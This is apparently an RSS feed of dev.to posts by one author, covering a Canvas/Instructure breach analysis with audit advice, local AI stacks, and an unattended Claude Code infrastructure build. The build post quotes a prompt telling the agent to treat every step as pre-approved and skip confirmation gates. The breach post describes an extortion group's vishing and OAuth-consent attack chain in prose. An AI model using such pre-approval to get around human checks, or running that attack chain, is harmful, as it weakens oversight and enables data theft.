&lt;strong&gt;NRF&lt;/strong&gt; -- National Response Framework. Federal doctrine for disaster response roles. &lt;br&gt;
&lt;strong&gt;HSEEP&lt;/strong&gt; -- Homeland Security Exercise and Evaluation Program. Federal methodology for designing and running emergency exercises. &lt;br&gt;
&lt;strong&gt;TTX&lt;/strong&gt; -- Tabletop Exercise. Discussion-based scenario exercise without physical resource deployment. &lt;br&gt;
&lt;strong&gt;IAP&lt;/strong&gt; -- Incident Action Plan. Documents incident objectives and assignments per operational period. &lt;br&gt;
&lt;strong&gt;PTB&lt;/strong&gt; -- Position Task Book. FEMA's official competency standard for each ICS position. &lt;br&gt;
&lt;strong&gt;MSEL&lt;/strong&gt; -- Master Scenario Events List. Pre-scripted sequence of exercise events.&lt;br&gt;
&lt;strong&gt;Inject&lt;/strong&gt; -- A scenario event introduced mid-exercise to drive participant decisions. &lt;br&gt;
&lt;strong&gt;EOM&lt;/strong&gt; -- Emergency Operations Manager. The person running the exercise. &lt;br&gt;
&lt;strong&gt;IC&lt;/strong&gt; -- Incident Commander. &lt;br&gt;
&lt;strong&gt;SO&lt;/strong&gt; -- Safety Officer. &lt;br&gt;
&lt;strong&gt;PIO&lt;/strong&gt; -- Public Information Officer. &lt;br&gt;
&lt;strong&gt;OSC&lt;/strong&gt; -- Operations Section Chief. &lt;br&gt;
&lt;strong&gt;PSC&lt;/strong&gt; -- Planning Section Chief. &lt;br&gt;
&lt;strong&gt;LSC&lt;/strong&gt; -- Logistics Section Chief.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Built with Gemma 4 26B MoE via Google AI Studio API. Stack: LiteLLM 1.83.10, OpenWebUI 0.9.2, Ollama 0.22.1, mxbai-embed-large 335M, TEI Reranker. Hardware: Dell Precision T3610, Ubuntu Server 24.04 LTS, 16-core Xeon, 128GB ECC RAM, RTX 3060. Knowledge base: 148 converted documents from NIMS, ICS, and HSEEP doctrine. All ICS/NIMS/HSEEP terminology used per official doctrine.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>devchallenge</category>
      <category>gemmachallenge</category>
      <category>gemma</category>
    </item>
    <item>
      <title>What is your favorite LLM? If you have several based on use let me know!</title>
      <dc:creator>Kerry Kier</dc:creator>
      <pubDate>Sun, 10 May 2026 17:55:14 +0000</pubDate>
      <link>https://dev.to/kkierii/what-is-your-favorite-llm-if-you-have-several-based-on-use-let-me-know-3lhl</link>
      <guid>https://dev.to/kkierii/what-is-your-favorite-llm-if-you-have-several-based-on-use-let-me-know-3lhl</guid>
      <description></description>
      <category>ai</category>
      <category>discuss</category>
      <category>llm</category>
      <category>productivity</category>
    </item>
    <item>
      <title>Instructure Got Breached Again. Here's What Your Canvas Integration Stack Inherited.</title>
      <dc:creator>Kerry Kier</dc:creator>
      <pubDate>Fri, 08 May 2026 18:45:13 +0000</pubDate>
      <link>https://dev.to/kkierii/instructure-got-breached-again-heres-what-your-canvas-integration-stack-inherited-i7g</link>
      <guid>https://dev.to/kkierii/instructure-got-breached-again-heres-what-your-canvas-integration-stack-inherited-i7g</guid>
      <description>&lt;h2&gt;
  
  
  The Failure Pattern
&lt;/h2&gt;

&lt;p&gt;On April 30, tools depending on Canvas API keys started failing across&lt;br&gt;
thousands of institutions. Instructure's status page called it "limited&lt;br&gt;
disruption to tools relying on API keys." Canvas Data 2 and Canvas Beta&lt;br&gt;
went into maintenance. By May 1, the CISO confirmed a criminal threat&lt;br&gt;
actor had been in the environment. Containment was declared May 2.&lt;/p&gt;

&lt;p&gt;The confirmed data classes: names, institutional email addresses, student&lt;br&gt;
ID numbers, and Canvas inbox messages. Instructure explicitly states no&lt;br&gt;
passwords, government IDs, or financial data were involved. The forensic&lt;br&gt;
investigation is still running.&lt;/p&gt;

&lt;p&gt;ShinyHunters claimed responsibility May 3, asserting 3.65TB exfiltrated&lt;br&gt;
across 275 million users at roughly 9,000 institutions. Those figures are&lt;br&gt;
adversary self-reporting and unverified. The University of Pennsylvania&lt;br&gt;
confirmed approximately 306,000 affected users -- that's the only&lt;br&gt;
institution-level figure from a confirmed source so far.&lt;/p&gt;

&lt;p&gt;No CVE. No CISA advisory. No IOC list. This is still an active&lt;br&gt;
investigation and Instructure hasn't disclosed the attack vector.&lt;/p&gt;

&lt;h2&gt;
  
  
  What the Disruption Signature Tells Us
&lt;/h2&gt;

&lt;p&gt;Instructure has not confirmed how the attacker got in. But the response&lt;br&gt;
pattern tells you something.&lt;/p&gt;

&lt;p&gt;They didn't force a password reset across the user base. They didn't push&lt;br&gt;
an emergency patch for a web vulnerability. They revoked privileged&lt;br&gt;
credentials and access tokens, rotated application keys, and deployed&lt;br&gt;
patches. That response is consistent with application-layer credential&lt;br&gt;
compromise -- something with privileged API access got taken, and the&lt;br&gt;
fix was to kill and reissue those credentials.&lt;/p&gt;

&lt;p&gt;Canvas Data 2 is the analytics export pipeline. It's the part of the&lt;br&gt;
stack designed to move data in bulk. That's the surface that went down.&lt;br&gt;
That's also what you'd target if you had stolen credentials that looked&lt;br&gt;
like legitimate administrative traffic -- because that's exactly what&lt;br&gt;
they were.&lt;/p&gt;

&lt;p&gt;This is inference, not Instructure's confirmed account. Flag it as such&lt;br&gt;
if you're briefing your team.&lt;/p&gt;

&lt;h2&gt;
  
  
  Who ShinyHunters Is and Why the TTP Matters
&lt;/h2&gt;

&lt;p&gt;ShinyHunters pivoted from mass data theft to targeted SaaS extortion in&lt;br&gt;
2024 and has spent the last eighteen months running campaigns against&lt;br&gt;
Salesforce environments specifically. Their summer 2025 Salesforce&lt;br&gt;
campaign is the most documented playbook.&lt;/p&gt;

&lt;p&gt;The attack chain didn't exploit Salesforce. It used voice phishing against&lt;br&gt;
help desk staff to get employees to authorize malicious OAuth Connected&lt;br&gt;
Apps through a standard authorization flow. Once the token was issued,&lt;br&gt;
they used Salesforce Data Loader -- a legitimate bulk export client -- to&lt;br&gt;
pull CRM data at scale. No malware. No custom tooling. Just a phone call,&lt;br&gt;
a legitimate-looking OAuth prompt, and the platform's own export&lt;br&gt;
functionality.&lt;/p&gt;

&lt;p&gt;That's the signature: get a credential that looks authorized, use&lt;br&gt;
legitimate tooling, make the exfiltration look like normal traffic. The&lt;br&gt;
Instructure disruption pattern -- API key failures, bulk analytics pipeline&lt;br&gt;
down, credential revocation as the containment action -- is consistent with&lt;br&gt;
that approach at the application layer.&lt;/p&gt;

&lt;p&gt;ShinyHunters also claims Instructure's Salesforce instance was hit as part&lt;br&gt;
of this campaign. Instructure confirmed a separate Salesforce breach via&lt;br&gt;
social engineering in September 2025. Whether May 2026 is a fresh&lt;br&gt;
intrusion or persistence from that incident hasn't been established.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Your Integration Stack Inherited
&lt;/h2&gt;

&lt;p&gt;This is the part the vendor notification won't explain clearly.&lt;/p&gt;

&lt;p&gt;Instructure rotated platform-side application keys. What that means in&lt;br&gt;
practice: every LTI tool, SIS connector, gradebook sync, analytics&lt;br&gt;
pipeline, and SSO configuration at your institution that held a&lt;br&gt;
Canvas-issued key got that key invalidated and reissued. Connected tools&lt;br&gt;
started prompting for reauthorization.&lt;/p&gt;

&lt;p&gt;What it does not mean: your tenant-generated API keys were rotated.&lt;br&gt;
Those are keys your institution created for your own integrations. They&lt;br&gt;
are not invalidated by Instructure's remediation. They are your&lt;br&gt;
responsibility.&lt;/p&gt;

&lt;p&gt;If you generated API keys for any Canvas integration -- reporting&lt;br&gt;
pipelines, custom LTI tools, data warehouse syncs, anything -- those&lt;br&gt;
keys need to be treated as potentially compromised until you've rotated&lt;br&gt;
them yourself.&lt;/p&gt;

&lt;p&gt;The second problem is the reauthorization window. An attacker holding&lt;br&gt;
confirmed institutional email addresses -- which is exactly what was&lt;br&gt;
taken -- can send reauthorization prompts that are structurally&lt;br&gt;
indistinguishable from the legitimate ones Instructure is triggering&lt;br&gt;
right now. In prior edtech incidents, the phishing wave followed the&lt;br&gt;
breach disclosure within weeks. That window is open.&lt;/p&gt;

&lt;p&gt;Any Canvas reauthorization email landing in an inbox rather than&lt;br&gt;
appearing inside the Canvas interface itself should be treated as&lt;br&gt;
suspicious.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to Audit Right Now
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Rotate tenant-generated API keys first.&lt;/strong&gt; Every key your institution&lt;br&gt;
created for Canvas integrations -- LTI tools, SIS connectors, reporting&lt;br&gt;
pipelines, data exports -- needs to be rotated. Don't wait for&lt;br&gt;
Instructure to tell you which keys were in scope. Assume all of them&lt;br&gt;
until you know otherwise.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;If Canvas SSO federates into Microsoft Entra ID, this is your checklist:&lt;/p&gt;

&lt;p&gt;Open &lt;strong&gt;Enterprise Applications&lt;/strong&gt; in Entra and filter for any app&lt;br&gt;
registered against Canvas or Instructure. For each one: check consented&lt;br&gt;
Graph API permissions against what the integration actually needs, rotate&lt;br&gt;
client secrets, and revoke and reissue any certificates. A Canvas-side&lt;br&gt;
credential that holds Graph API access into your Entra tenant is a path&lt;br&gt;
to your directory, not just Canvas.&lt;/p&gt;
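&lt;p&gt;A sketch of the local half of that sweep. The Graph endpoints themselves (&lt;code&gt;/v1.0/servicePrincipals&lt;/code&gt;, &lt;code&gt;/v1.0/oauth2PermissionGrants&lt;/code&gt;) are real; the records below are invented:&lt;/p&gt;

```python
# Filter an exported Entra service principal list for Canvas/Instructure-linked
# apps and surface their delegated scopes. In practice these lists come from
# paging GET /v1.0/servicePrincipals and GET /v1.0/oauth2PermissionGrants;
# the records below are invented.
SERVICE_PRINCIPALS = [
    {"id": "sp-1", "displayName": "Canvas LMS SSO"},
    {"id": "sp-2", "displayName": "Payroll Connector"},
]
GRANTS = [
    {"clientId": "sp-1", "scope": "User.Read Directory.Read.All"},
]

def canvas_linked(sp):
    name = sp["displayName"].lower()
    return "canvas" in name or "instructure" in name

def scopes_for(sp_id):
    return [g["scope"] for g in GRANTS if g["clientId"] == sp_id]

for sp in SERVICE_PRINCIPALS:
    if canvas_linked(sp):
        # Anything holding directory-wide scopes deserves a hard look.
        print(sp["displayName"], scopes_for(sp["id"]))
```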

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Audit OAuth grants in every identity provider Canvas touches.&lt;/strong&gt;&lt;br&gt;
A stolen Canvas-linked credential with directory permissions is&lt;br&gt;
lateral movement waiting to happen. The breach is at Instructure.&lt;br&gt;
The blast radius is wherever those credentials reach.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Run the same check against any other identity provider Canvas federates&lt;br&gt;
against -- Okta, Google Workspace, ADFS. Inventory every app registration&lt;br&gt;
and OAuth grant. Verify least-privilege scope on each one.&lt;/p&gt;

&lt;p&gt;Enforce MFA on privileged accounts -- Instructure's own post-containment&lt;br&gt;
guidance said this explicitly. And treat any Canvas-themed email asking&lt;br&gt;
for credential input as a potential phishing attempt for the next sixty&lt;br&gt;
to ninety days.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Architecture Problem
&lt;/h2&gt;

&lt;p&gt;Canvas integrates with over 1,000 external tools across 7,000+&lt;br&gt;
institutions. When Instructure gets compromised, every institution's&lt;br&gt;
integration stack inherits the exposure simultaneously. None of your own&lt;br&gt;
perimeter controls see it because the attacker never touched your&lt;br&gt;
perimeter. The traffic looked authorized because the credentials were&lt;br&gt;
authorized -- just stolen.&lt;/p&gt;

&lt;p&gt;PowerSchool. Infinite Campus. Now Instructure. Three major edtech vendors&lt;br&gt;
in eighteen months. The vendors are different. The structural pattern is&lt;br&gt;
identical: single SaaS provider, single credential compromise, thousands&lt;br&gt;
of institutions inherit the breach at once.&lt;/p&gt;

&lt;p&gt;The question worth sitting with isn't how to harden Canvas from outside&lt;br&gt;
-- you can't do that. It's what your institution's Canvas deployment&lt;br&gt;
trusts, how many integrations that trust extends through, and whether&lt;br&gt;
you have visibility into the OAuth consent graph that Canvas holds into&lt;br&gt;
your environment. For most institutions, the honest answer to the last&lt;br&gt;
part is no.&lt;/p&gt;

&lt;p&gt;Keep an eye on &lt;a href="https://status.instructure.com" rel="noopener noreferrer"&gt;status.instructure.com&lt;/a&gt;&lt;br&gt;
and your institution's IT security page. The investigation is still&lt;br&gt;
running and the notification timeline is still developing.&lt;/p&gt;

&lt;p&gt;If you've run the Entra audit already and found something worth sharing,&lt;br&gt;
I'd be curious what the consent graph looked like in a mature Canvas&lt;br&gt;
deployment.&lt;/p&gt;

</description>
      <category>security</category>
      <category>devops</category>
      <category>cloud</category>
      <category>infosec</category>
    </item>
    <item>
      <title>Beyond the Hype: The 2026 Systems Engineering Realignment (and what it means for your stack)</title>
      <dc:creator>Kerry Kier</dc:creator>
      <pubDate>Mon, 04 May 2026 15:54:44 +0000</pubDate>
      <link>https://dev.to/kkierii/beyond-the-hype-the-2026-systems-engineering-realignment-and-what-it-means-for-your-stack-3bai</link>
      <guid>https://dev.to/kkierii/beyond-the-hype-the-2026-systems-engineering-realignment-and-what-it-means-for-your-stack-3bai</guid>
      <description>&lt;p&gt;Something shifted in the last ninety days. While the headlines talk about 1.9% tech growth, those of us in the trenches are seeing a different reality: the floor has been hit. &lt;/p&gt;

&lt;p&gt;We are no longer in the "automation at all costs" era. We have entered the era of Human-Led Resilience.  &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj6d33dq5dttgbh5ldui2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj6d33dq5dttgbh5ldui2.png" alt="Systems Engineer at a mission-critical command center monitoring network resilience and local AI infrastructure." width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Reality of 27-Second Breakouts&lt;/strong&gt;  &lt;/p&gt;

&lt;p&gt;In my day job in public safety communications, "uptime" isn't a KPI; it's a life-safety requirement. That perspective changes how you view modern incidents like the Vercel/Context.ai breach.  &lt;/p&gt;

&lt;p&gt;When an OAuth chain is compromised and the average eCrime breakout time hits 29 minutes (with some clocked at 27 seconds), your AI chatbot isn't going to save you. You need a human who knows the environment at a granular level.  &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;My "Human in the Lead" Stack&lt;/strong&gt;  &lt;/p&gt;

&lt;p&gt;I don't just talk about resilience; I test it. To maintain digital sovereignty and high-availability skills, I run a local-first inference and infrastructure stack:  &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Compute:&lt;/strong&gt; Dell T3610 (hardened for local inference)  &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;AI Orchestration:&lt;/strong&gt; Ollama, LiteLLM, and Open WebUI  &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Virtualization:&lt;/strong&gt; Proxmox &amp;amp; VMware ESXi  &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Sovereignty:&lt;/strong&gt; Nextcloud (Project Skyvault)  &lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Building this way isn't just about privacy; it's about accountability. If the stack hits a wall, I am the one who owns the resolution.  &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The New Baseline for 2026&lt;/strong&gt;  &lt;/p&gt;

&lt;p&gt;The "junior pipeline" is compressing because generalist roles are being absorbed by automation. The demand is landing on engineers who can bridge the gap between technical execution and real-world strategic thinking.  &lt;/p&gt;

&lt;p&gt;Organizations have enough scar tissue now. They aren't looking for someone to "run the tool"; they are looking for the person who can govern the outcome.  &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Technical References &amp;amp; Implementation Logs&lt;/strong&gt;  &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;The Definitive Version:&lt;/strong&gt; &lt;a href="https://www.google.com/search?q=https://blog.vertexops.org/2026-tech-realignment-hitl-engineering" rel="noopener noreferrer"&gt;Full Article at VertexOps&lt;/a&gt;  &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Workforce Analysis:&lt;/strong&gt; &lt;a href="https://www.comptia.org/en/resources/research/state-of-the-tech-workforce-2026/" rel="noopener noreferrer"&gt;CompTIA State of the Tech Workforce 2026&lt;/a&gt;  &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Incident Case Study:&lt;/strong&gt; &lt;a href="https://www.google.com/search?q=https://itecsonline.com/post/vercel-context-ai-breach-oauth-supply-chain-attack" rel="noopener noreferrer"&gt;Vercel Breach Breakdown (ITECS)&lt;/a&gt;  &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Threat Intel:&lt;/strong&gt; &lt;a href="https://www.crowdstrike.com/global-threat-report/" rel="noopener noreferrer"&gt;CrowdStrike 2026 Global Threat Report&lt;/a&gt;  &lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Let's talk in the comments: How are you handling the shift toward "Human in the Lead" in your current environment? Are you leaning more into local sovereignty or managed services?&lt;/p&gt;

</description>
      <category>ai</category>
      <category>devops</category>
      <category>cybersecurity</category>
      <category>webdev</category>
    </item>
    <item>
      <title>Does anyone here know anyone who would be willing to test a custom workspace LLM based on Kimi2.6 and meant for autistic teens? I want to see if the safety guardrails are working, as I am out of ideas to red team it. I can supply my last report if needed.</title>
      <dc:creator>Kerry Kier</dc:creator>
      <pubDate>Sun, 03 May 2026 15:51:55 +0000</pubDate>
      <link>https://dev.to/kkierii/does-anyone-here-know-anyone-that-woudl-be-willing-to-test-a-custom-workspace-llm-based-on-kimi26-183</link>
      <guid>https://dev.to/kkierii/does-anyone-here-know-anyone-that-woudl-be-willing-to-test-a-custom-workspace-llm-based-on-kimi26-183</guid>
      <description></description>
      <category>discuss</category>
      <category>llm</category>
      <category>security</category>
      <category>testing</category>
    </item>
    <item>
      <title>I Let Claude Code Build My Self-Hosted AI Stack Unattended. Here's What Actually Happened.</title>
      <dc:creator>Kerry Kier</dc:creator>
      <pubDate>Thu, 30 Apr 2026 19:47:54 +0000</pubDate>
      <link>https://dev.to/kkierii/i-let-claude-code-build-my-self-hosted-ai-stack-unattended-heres-what-actually-happened-4c96</link>
      <guid>https://dev.to/kkierii/i-let-claude-code-build-my-self-hosted-ai-stack-unattended-heres-what-actually-happened-4c96</guid>
      <description>&lt;p&gt;Most "I tried AI-generated infrastructure" posts end one of two ways: either everything worked perfectly (it didn't), or it burned everything down (also didn't happen). Mine landed somewhere more useful than either of those.&lt;/p&gt;

&lt;p&gt;I wrote a detailed prompt, pointed Claude Code at a fresh Ubuntu Server 24.04 VM running on VMware ESXi 8, and walked away. No approvals. No babysitting. One unattended session to build a four-service AI inference stack from nothing.&lt;/p&gt;

&lt;p&gt;Here's what came out, what broke, and the five fixes that mattered.&lt;/p&gt;




&lt;h2&gt;
  
  
  What I Was Building
&lt;/h2&gt;

&lt;p&gt;The goal: a fully self-hosted AI stack I could use to test local models and experiment with an LLM gateway. Four services, all running in Docker on a single internal bridge network:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Ollama&lt;/strong&gt; for local LLM inference&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;LiteLLM&lt;/strong&gt; as an OpenAI-compatible proxy with key management and spend tracking&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Open WebUI&lt;/strong&gt; as the chat frontend&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PostgreSQL 16&lt;/strong&gt; as LiteLLM's backend database&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The network design was intentional. Open WebUI talks to LiteLLM, not directly to Ollama. LiteLLM routes to local models or Ollama Cloud depending on what's selected. Ollama has no host port binding at all — the only way to reach it from outside the Docker network is through the gateway. Only ports 3000 and 4000 exposed. UFW locking everything else.&lt;/p&gt;
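&lt;p&gt;A sketch of that exposure pattern in compose terms. Image tags and the network name are assumptions, not the generated file:&lt;/p&gt;

```yaml
# Sketch only: Ollama gets no ports: section, so it is unreachable from
# the host; the UI and the gateway are the only published services.
services:
  ollama:
    image: ollama/ollama
    networks: [ai-internal]
  litellm:
    image: ghcr.io/berriai/litellm:main-latest
    ports: ["4000:4000"]      # the gateway, the only API path in
    networks: [ai-internal]
  open-webui:
    image: ghcr.io/open-webui/open-webui:main
    ports: ["3000:8080"]      # chat frontend (8080 is its internal port)
    networks: [ai-internal]
networks:
  ai-internal:
    driver: bridge
```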

&lt;p&gt;This is a CPU-only dev environment (the RTX 3060 lives in my homelab box, not this VM), so I wasn't expecting blazing inference speed. I wanted a working stack I could actually build on.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Prompt Did Most of the Work
&lt;/h2&gt;

&lt;p&gt;Before running anything, I spent real time writing the prompt. Turns out this was the part that mattered most.&lt;/p&gt;

&lt;p&gt;I covered directory structure, secret generation strategy, the full Docker Compose configuration, healthcheck logic, UFW rules, and a required credential summary at the end. A few things I was deliberate about:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Secrets.&lt;/strong&gt; All passwords and API keys generated with &lt;code&gt;openssl rand&lt;/code&gt;, stored in a &lt;code&gt;.env&lt;/code&gt; file immediately &lt;code&gt;chmod 600&lt;/code&gt;'d, never hardcoded anywhere. LiteLLM's &lt;code&gt;config.yaml&lt;/code&gt; uses &lt;code&gt;os.environ/&lt;/code&gt; references throughout. The &lt;code&gt;.env&lt;/code&gt; gets passed to containers via Docker's &lt;code&gt;env_file:&lt;/code&gt; directive, which injects values as environment variables rather than mounting the file anywhere web-accessible.&lt;/p&gt;
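&lt;p&gt;The same pattern in Python, for illustration; the run itself used &lt;code&gt;openssl rand&lt;/code&gt;, and the variable names match what this stack's services expect:&lt;/p&gt;

```python
import os
import secrets

# Equivalent of the `openssl rand`-based generation the prompt asked for:
# random values, written once to .env, locked to owner-only immediately.
env_vars = {
    "POSTGRES_PASSWORD": secrets.token_hex(32),
    "LITELLM_MASTER_KEY": "sk-" + secrets.token_hex(24),  # LiteLLM expects an sk- prefix
    "WEBUI_SECRET_KEY": secrets.token_hex(32),
}

with open(".env", "w") as f:
    for key, value in env_vars.items():
        f.write(f"{key}={value}\n")

os.chmod(".env", 0o600)  # owner read/write only, before anything else reads it
```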

&lt;p&gt;&lt;strong&gt;Non-interactive mode.&lt;/strong&gt; This single paragraph changed everything:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;You have full sudo access. Execute every step autonomously without pausing to ask for confirmation, approval, or clarification. Treat every step as pre-approved.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Without it, Claude Code gates on nearly every tool use. File writes, sudo commands, service restarts — all of it pauses for approval. That one block is the difference between a fully autonomous run and you clicking "yes" for twenty minutes.&lt;/p&gt;




&lt;h2&gt;
  
  
  What It Did on Its Own
&lt;/h2&gt;

&lt;p&gt;I ran the prompt and left it. The sequence, with zero input from me:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Installed Docker Engine from the official apt repo&lt;/li&gt;
&lt;li&gt;Created &lt;code&gt;/opt/ai-stack/&lt;/code&gt; with the full directory structure&lt;/li&gt;
&lt;li&gt;Generated all secrets with &lt;code&gt;openssl rand&lt;/code&gt;, then wrote and immediately locked down &lt;code&gt;.env&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Wrote &lt;code&gt;litellm/config.yaml&lt;/code&gt; using environment variable references (no secrets hardcoded)&lt;/li&gt;
&lt;li&gt;Created &lt;code&gt;prometheus/prometheus.yml&lt;/code&gt; as a required placeholder file (if this doesn't exist as a file, Docker creates it as a directory and compose fails; good catch)&lt;/li&gt;
&lt;li&gt;Wrote &lt;code&gt;docker-compose.yml&lt;/code&gt; with all four services, including healthchecks and dependency ordering&lt;/li&gt;
&lt;li&gt;Configured UFW with the SSH rule added first, then enabled it with &lt;code&gt;--force&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Ran &lt;code&gt;docker compose pull&lt;/code&gt;, then &lt;code&gt;docker compose up -d&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Verified each service and printed a full credential summary&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;One session. No prompts. No intervention.&lt;/p&gt;




&lt;h2&gt;
  
  
  90% There. Five Fixes Required.
&lt;/h2&gt;

&lt;p&gt;The core infrastructure was solid. Containers came up in the right order, healthchecks resolved, the dependency chain worked, UFW was sane, secrets were handled correctly. I verified externally that nothing sensitive was web-accessible.&lt;/p&gt;

&lt;p&gt;The issues that needed fixing weren't architecture problems. They were configuration details — three of which are useful to know regardless of how you built the stack.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Fix 1: The LiteLLM healthcheck was broken in two ways.&lt;/strong&gt; The compose file used &lt;code&gt;/health&lt;/code&gt; with &lt;code&gt;curl&lt;/code&gt;. Problem: &lt;code&gt;/health&lt;/code&gt; on LiteLLM requires an API key, so Docker got a &lt;code&gt;401&lt;/code&gt; and interpreted it as a failed healthcheck. Also, &lt;code&gt;curl&lt;/code&gt; isn't installed in the LiteLLM image. The fix was switching to &lt;code&gt;/health/liveliness&lt;/code&gt; (no auth required) and replacing curl with a Python one-liner:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;healthcheck&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;test&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;CMD-SHELL"&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;python3&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;-c&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s"&gt;import&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;urllib.request;&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;urllib.request.urlopen('http://localhost:4000/health/liveliness')&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
  &lt;span class="na"&gt;interval&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;15s&lt;/span&gt;
  &lt;span class="na"&gt;timeout&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;10s&lt;/span&gt;
  &lt;span class="na"&gt;retries&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;5&lt;/span&gt;
  &lt;span class="na"&gt;start_period&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;30s&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This one mattered most. Open WebUI's &lt;code&gt;depends_on&lt;/code&gt; condition is &lt;code&gt;service_healthy&lt;/code&gt; for LiteLLM. Broken healthcheck means Open WebUI never starts. Fix the healthcheck and everything downstream resolves.&lt;/p&gt;
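&lt;p&gt;The dependency edge in compose form, as a sketch with the service names used in this stack:&lt;/p&gt;

```yaml
open-webui:
  depends_on:
    litellm:
      condition: service_healthy   # startup blocks until the healthcheck passes
```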

&lt;p&gt;&lt;strong&gt;Fix 2: &lt;code&gt;ENABLE_OLLAMA_API&lt;/code&gt; was set to false.&lt;/strong&gt; Local models pulled into the Ollama container weren't showing up in the model selector. Setting it to &lt;code&gt;"true"&lt;/code&gt; gives Open WebUI a direct connection to Ollama for listing local models, while still using LiteLLM as the API gateway. Simple, but invisible until you're staring at an empty model list wondering what happened.&lt;/p&gt;
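&lt;p&gt;The relevant environment block, sketched; the two URL lines are assumptions about this particular setup rather than universal defaults:&lt;/p&gt;

```yaml
open-webui:
  environment:
    ENABLE_OLLAMA_API: "true"                     # lets the UI list local Ollama models
    OLLAMA_BASE_URL: http://ollama:11434          # reachable only inside the bridge network
    OPENAI_API_BASE_URL: http://litellm:4000/v1   # chat traffic still routes through the gateway
```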

&lt;p&gt;&lt;strong&gt;Fix 3: &lt;code&gt;DATABASE_URL&lt;/code&gt; leaked into Open WebUI via &lt;code&gt;env_file&lt;/code&gt;.&lt;/strong&gt; This is the one worth writing down somewhere.&lt;/p&gt;

&lt;p&gt;Docker's &lt;code&gt;env_file:&lt;/code&gt; passes every variable in the file to the container — every one. &lt;code&gt;DATABASE_URL&lt;/code&gt; (LiteLLM's PostgreSQL connection string) was in the shared &lt;code&gt;.env&lt;/code&gt;. Open WebUI picked it up, tried to connect to LiteLLM's Postgres instance, and crashed immediately on missing tables. The UI stopped loading entirely.&lt;/p&gt;

&lt;p&gt;The fix: remove &lt;code&gt;DATABASE_URL&lt;/code&gt; from &lt;code&gt;.env&lt;/code&gt;. Set it inline on the LiteLLM service only:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
